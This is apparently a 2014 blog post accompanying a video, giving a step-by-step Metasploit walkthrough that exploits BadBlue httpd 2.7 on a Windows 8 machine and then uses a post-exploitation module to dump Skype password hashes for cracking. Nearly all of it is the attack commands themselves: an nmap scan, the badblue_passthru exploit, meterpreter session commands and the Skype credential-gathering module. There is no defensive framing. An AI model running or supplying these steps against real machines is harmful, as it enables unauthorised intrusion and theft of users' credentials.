Archive | October 16, 2014

Post Exploitation: Dump Skype Hash with Metasploit using BadBlue httpd 2.7

The video shows how to dump Skype hashes using metasploit framework and the BadBlue httpd 2.7. Here are the steps:

  • Exploiting Windows 8 Machine using BadBlue httpd 2.7
  • Use Post Exploitation Skype module to dump the hashes
  • Crack MD5 hashes, as you will not get a plain text password(s)
nmap -sS -sV

msf> use exploit/windows/http/badblue_passthru
msf exploit(badblue_passthru) > set RHOST
msf exploit(badblue_passthru) > exploit

meterpreter > sysinfo
meterpreter > ipconfig
meterpreter > background

msf exploit(badblue_passthru) > search skype
msf exploit(badblue_passthru) > use post/windows/gather/credentials/skype

msf post(skype) > set SESSION 2
msf post(skype) > exploit